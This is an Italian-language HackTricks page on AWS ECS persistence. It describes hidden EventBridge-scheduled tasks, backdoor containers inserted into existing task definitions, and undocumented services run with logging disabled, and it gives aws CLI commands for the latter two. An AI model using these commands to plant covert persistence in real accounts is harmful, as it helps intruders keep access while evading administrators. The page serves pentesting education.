AWS - ECS Persistence

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 3 days ago

AWS - ECS Persistence

Impara e pratica il hacking AWS: Impara e pratica il hacking GCP:

Supporta HackTricks

Controlla i !
Unisciti al 💬 o al o seguici su Twitter 🐦 .
Condividi trucchi di hacking inviando PR ai e repos su github.

ECS

Per ulteriori informazioni controlla:

Attività ECS Periodica Nascosta

TODO: Test

Un attaccante può creare un'attività ECS periodica nascosta utilizzando Amazon EventBridge per pianificare l'esecuzione di un'attività malevola periodicamente. Questa attività può eseguire ricognizione, esfiltrare dati o mantenere la persistenza nell'account AWS.

Backdoor Container in Existing ECS Task Definition

TODO: Test

Un attaccante può aggiungere un container backdoor furtivo in una definizione di task ECS esistente che viene eseguito insieme ai container legittimi. Il container backdoor può essere utilizzato per la persistenza e per eseguire attività malevole.

Servizio ECS non documentato

TODO: Test

Un attaccante può creare un servizio ECS non documentato che esegue un'attività malevola. Impostando il numero desiderato di attività al minimo e disabilitando la registrazione, diventa più difficile per gli amministratori notare il servizio malevolo.

Supporta HackTricks

PreviousAWS - ECR Persistence NextAWS - Elastic Beanstalk Persistence

Last updated 3 days ago

ECS

Per ulteriori informazioni controlla:

Attività ECS Periodica Nascosta

TODO: Test

Backdoor Container in Existing ECS Task Definition

TODO: Test

# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'

Servizio ECS non documentato

TODO: Test

# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'

# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"

Impara e pratica AWS Hacking: Impara e pratica GCP Hacking:

Supporta HackTricks

Controlla i !
Unisciti al 💬 o al o seguici su Twitter 🐦 .
Condividi trucchi di hacking inviando PR ai e repos di github.